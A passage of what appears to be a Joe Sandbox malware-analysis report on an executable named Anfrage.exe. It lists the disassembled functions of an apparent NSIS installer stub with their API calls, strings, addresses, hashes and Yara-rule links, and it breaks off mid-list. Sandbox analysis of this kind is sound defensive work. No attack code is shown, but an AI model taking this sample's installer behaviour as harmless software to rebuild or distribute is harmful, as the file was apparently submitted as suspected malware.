                                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404294
                                                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004042D4
                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 004042E3
                                                                          • SetCursor.USER32(00000000), ref: 004042EC
                                                                          • ShellExecuteA.SHELL32(0000070B,open,0042E3A0,00000000,00000000,00000001), ref: 004042FF
                                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 0040430C
                                                                          • SetCursor.USER32(00000000), ref: 0040430F
                                                                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040433B
                                                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040434F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                          • String ID: Call$N$open
                                                                          • API String ID: 3615053054-2563687911
                                                                          • Opcode ID: 0fabdefe5dfe810703eedaaf7f5204b78cec4d5337582d6cb8c9095239a0e9c5
                                                                          • Instruction ID: 596f938780ddc00ccda35ae91e452bcb2762d229451626cd39d0fa48fc5db7d6
                                                                          • Opcode Fuzzy Hash: 0fabdefe5dfe810703eedaaf7f5204b78cec4d5337582d6cb8c9095239a0e9c5
                                                                          • Instruction Fuzzy Hash: FC61B3B1A40209BFEB109F60DD45F6A7B69FB84701F10803AFB04BA2D1C7B8A951CB58
                                                                          Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                          • DrawTextA.USER32(00000000,Hves Setup,000000FF,00000010,00000820), ref: 00401156
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                          • String ID: F$Hves Setup
                                                                          • API String ID: 941294808-4240652887
                                                                          • Opcode ID: b3683ee5f9b0c2be8bfd93dc29e84564bacc2454be597716fe8f92258ad350e3
                                                                          • Instruction ID: eed311f0ba3f5168439b37af4fa11fc7bb37c730dc1785cefb354bf9b42296a2
                                                                          • Opcode Fuzzy Hash: b3683ee5f9b0c2be8bfd93dc29e84564bacc2454be597716fe8f92258ad350e3
                                                                          • Instruction Fuzzy Hash: FF418C71800209AFCF059F95DE459AFBBB9FF44314F00842EF9A1AA1A0C774E955DFA4
                                                                          Function 00405B0C Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • lstrcpyA.KERNEL32(0042C5F8,NUL,?,00000000,?,00000000,00405C9F,?,?), ref: 00405B1B
                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405C9F,?,?), ref: 00405B3F
                                                                          • GetShortPathNameA.KERNEL32(?,0042C5F8,00000400), ref: 00405B48
                                                                            • Part of subcall function 0040599B: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405BF8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059AB
                                                                            • Part of subcall function 0040599B: lstrlenA.KERNEL32(00000000,?,00000000,00405BF8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059DD
                                                                          • GetShortPathNameA.KERNEL32(0042C9F8,0042C9F8,00000400), ref: 00405B65
                                                                          • wsprintfA.USER32 ref: 00405B83
                                                                          • GetFileSize.KERNEL32(00000000,00000000,0042C9F8,C0000000,00000004,0042C9F8,?,?,?,?,?), ref: 00405BBE
                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405BCD
                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                                          • SetFilePointer.KERNEL32(0040A3B0,00000000,00000000,00000000,00000000,0042C1F8,00000000,-0000000A,0040A3B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405C5B
                                                                          • GlobalFree.KERNEL32(00000000), ref: 00405C6C
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405C73
                                                                            • Part of subcall function 00405A36: GetFileAttributesA.KERNELBASE(00000003,00402D3A,C:\Users\user\Desktop\Anfrage.exe,80000000,00000003), ref: 00405A3A
                                                                            • Part of subcall function 00405A36: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405A5C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                          • String ID: %s=%s$NUL$[Rename]
                                                                          • API String ID: 222337774-4148678300
                                                                          • Opcode ID: 5ce72f1d5662fdfb16fbdc716e83a23565de7620f696fffa2ec6c38a8c937bd1
                                                                          • Instruction ID: 6293277805e4fd93310031222b01184603883beffbc8e30d5776d07611dc3463
                                                                          • Opcode Fuzzy Hash: 5ce72f1d5662fdfb16fbdc716e83a23565de7620f696fffa2ec6c38a8c937bd1
                                                                          • Instruction Fuzzy Hash: 0D310171204B19BBE2206B255E89F6B3A5CDF42758F14013AFE41F22D2DA7C9C058EAD
                                                                          Function 0040602E Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Anfrage.exe",75573410,C:\Users\user\AppData\Local\Temp\,00000000,0040317E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403393), ref: 00406086
                                                                          • CharNextA.USER32(?,?,?,00000000), ref: 00406093
                                                                          • CharNextA.USER32(?,"C:\Users\user\Desktop\Anfrage.exe",75573410,C:\Users\user\AppData\Local\Temp\,00000000,0040317E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403393), ref: 00406098
                                                                          • CharPrevA.USER32(?,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000,0040317E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403393), ref: 004060A8
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040602F
                                                                          • *?|<>/":, xrefs: 00406076
                                                                          • "C:\Users\user\Desktop\Anfrage.exe", xrefs: 0040606A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Char$Next$Prev
                                                                          • String ID: "C:\Users\user\Desktop\Anfrage.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 589700163-1408480782
                                                                          • Opcode ID: c65cd21f9bebafd0fa0734b05f9293669e0a6699517ac04d9452259f54362241
                                                                          • Instruction ID: 6dd00fd98cdd52380b6000705bfe1b2e5a3199cd407f9fb4c243556cad1baf37
                                                                          • Opcode Fuzzy Hash: c65cd21f9bebafd0fa0734b05f9293669e0a6699517ac04d9452259f54362241
                                                                          • Instruction Fuzzy Hash: E81104A28847952DEB3296344C44B776F894F967A0F19007BE8C6722C3CA7C5CA2836D
                                                                          Function 0040400F Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowLongA.USER32(?,000000EB), ref: 0040402C
                                                                          • GetSysColor.USER32(00000000), ref: 00404048
                                                                          • SetTextColor.GDI32(?,00000000), ref: 00404054
                                                                          • SetBkMode.GDI32(?,?), ref: 00404060
                                                                          • GetSysColor.USER32(?), ref: 00404073
                                                                          • SetBkColor.GDI32(?,?), ref: 00404083
                                                                          • DeleteObject.GDI32(?), ref: 0040409D
                                                                          • CreateBrushIndirect.GDI32(?), ref: 004040A7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                          • String ID:
                                                                          • API String ID: 2320649405-0
                                                                          • Opcode ID: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
                                                                          • Instruction ID: 4b93f18e3972f6c94df15fd0826ae0e2c8d28fcec101fb7672849d56c603d5ef
                                                                          • Opcode Fuzzy Hash: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
                                                                          • Instruction Fuzzy Hash: 792124B1500744ABCB319F78DD48B5BBBF8AF41714B04892DEA96F22A0D734D944CB55
                                                                          Function 100021FA Relevance: 10.6, APIs: 7, Instructions: 139memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GlobalFree.KERNEL32(00000000), ref: 1000234A
                                                                            • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
                                                                          • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
                                                                          • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
                                                                          • GlobalFree.KERNEL32(00000000), ref: 100022FB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2139530556.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.2139512227.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2139550102.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2139589277.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                          • String ID:
                                                                          • API String ID: 3730416702-0
                                                                          • Opcode ID: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                          • Instruction ID: bfa8c22ebd78897ea4dc14f883c746723b208fa17a75ef0c69fbb79ff87ab60c
                                                                          • Opcode Fuzzy Hash: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                          • Instruction Fuzzy Hash: B541ABB1108311EFF320DFA48884B5BB7F8FF443D1F218529F946D61A9DB34AA448B61
                                                                          Function 100023DA Relevance: 10.6, APIs: 7, Instructions: 111COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                          • GlobalFree.KERNEL32(?), ref: 100024B5
                                                                          • GlobalFree.KERNEL32(00000000), ref: 100024EF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2139530556.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.2139512227.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2139550102.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2139589277.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Global$Free$Alloc
                                                                          • String ID:
                                                                          • API String ID: 1780285237-0
                                                                          • Opcode ID: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                          • Instruction ID: 4e6b36a645f71e2aed4a85f2c36ff1861f2741140ba068ae73f9b0a79c1593cf
                                                                          • Opcode Fuzzy Hash: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                          • Instruction Fuzzy Hash: EA319CB1504250EFF322CF64CCC4C6B7BBDEB852D4B124529FA4193168CB31AC94DB62
                                                                          Function 00404FDC Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(0042A048,00000000,0041C020,755723A0,?,?,?,?,?,?,?,?,?,0040308E,00000000,?), ref: 00405015
                                                                          • lstrlenA.KERNEL32(0040308E,0042A048,00000000,0041C020,755723A0,?,?,?,?,?,?,?,?,?,0040308E,00000000), ref: 00405025
                                                                          • lstrcatA.KERNEL32(0042A048,0040308E,0040308E,0042A048,00000000,0041C020,755723A0), ref: 00405038
                                                                          • SetWindowTextA.USER32(0042A048,0042A048), ref: 0040504A
                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
                                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
                                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                          • String ID:
                                                                          • API String ID: 2531174081-0
                                                                          • Opcode ID: 3b2410e8308c6412343eb032780aba43e390b926bae686ddbb8ef07075a9bc68
                                                                          • Instruction ID: 94b0b073a5ce97ddacba51ea26bc878ee4e16423412cd9a98c67571b7997b3ab
                                                                          • Opcode Fuzzy Hash: 3b2410e8308c6412343eb032780aba43e390b926bae686ddbb8ef07075a9bc68
                                                                          • Instruction Fuzzy Hash: D5219D71900518BBDF119FA5CD84ADFBFA9EF04354F14807AF944B6291C6398E40CFA8
                                                                          Function 004048A7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004048C2
                                                                          • GetMessagePos.USER32 ref: 004048CA
                                                                          • ScreenToClient.USER32(?,?), ref: 004048E4
                                                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 004048F6
                                                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040491C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Message$Send$ClientScreen
                                                                          • String ID: f
                                                                          • API String ID: 41195575-1993550816
                                                                          • Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                                          • Instruction ID: b60015b5b4e1efc5408348c5136693cdb789d2fb79533d825e55e5a5312c0c55
                                                                          • Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                                          • Instruction Fuzzy Hash: CE015EB590021DBAEB00DBA4DD85BFFBBBCAF55711F10412BBA50B61C0C7B499018BA4
                                                                          Function 00401D95 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDC.USER32(?), ref: 00401D98
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401DCB
                                                                          • CreateFontIndirectA.GDI32(0040B818), ref: 00401E1A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                          • String ID: Tahoma
                                                                          • API String ID: 3808545654-3580928618
                                                                          • Opcode ID: 4a9721664201bd5593a8fcbda807d16f2860009d8a73813414fafdd84ed437a3
                                                                          • Instruction ID: 1358c95a7d37f972e16a3fa2afb190f01721c65bbfaef5fc63903db35bf40af4
                                                                          • Opcode Fuzzy Hash: 4a9721664201bd5593a8fcbda807d16f2860009d8a73813414fafdd84ed437a3
                                                                          • Instruction Fuzzy Hash: DD015272544240AFE7006B74AE4A7A93FF8DB59315F10843AF141B62F2CB7900458FAD
                                                                          Function 00402C13 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C2E
                                                                          • MulDiv.KERNEL32(0012F3E6,00000064,001318C0), ref: 00402C59
                                                                          • wsprintfA.USER32 ref: 00402C69
                                                                          • SetWindowTextA.USER32(?,?), ref: 00402C79
                                                                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402C8B
                                                                          Strings
                                                                          • verifying installer: %d%%, xrefs: 00402C63
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121695499.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                          • String ID: verifying installer: %d%%
                                                                          • API String ID: 1451636040-82062127
                                                                          • Opcode ID: bfb410b3b6209971c20e4d2875b6fc85698dfbb326aa5bfda2d4b594da7e2ec0
                                                                          • Instruction ID: 7317fb9631212961ca73b33fff5b89fd9836da26efc2a3b2e30b0290716cf4a9
                                                                          • Opcode Fuzzy Hash: bfb410b3b6209971c20e4d2875b6fc85698dfbb326aa5bfda2d4b594da7e2ec0
                                                                          • Instruction Fuzzy Hash: 0E01627060020CFBEF209F60DE09EEE37A9EB04304F008039FA06A51D0DBB899518F58
                                                                          Function 00402749 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027B9
                                                                          • GlobalFree.KERNEL32(?), ref: 004027F2
                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402805
                                                                          • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040281D
                                                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402831
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2121544761.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2121520366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121563651.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2121584129.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
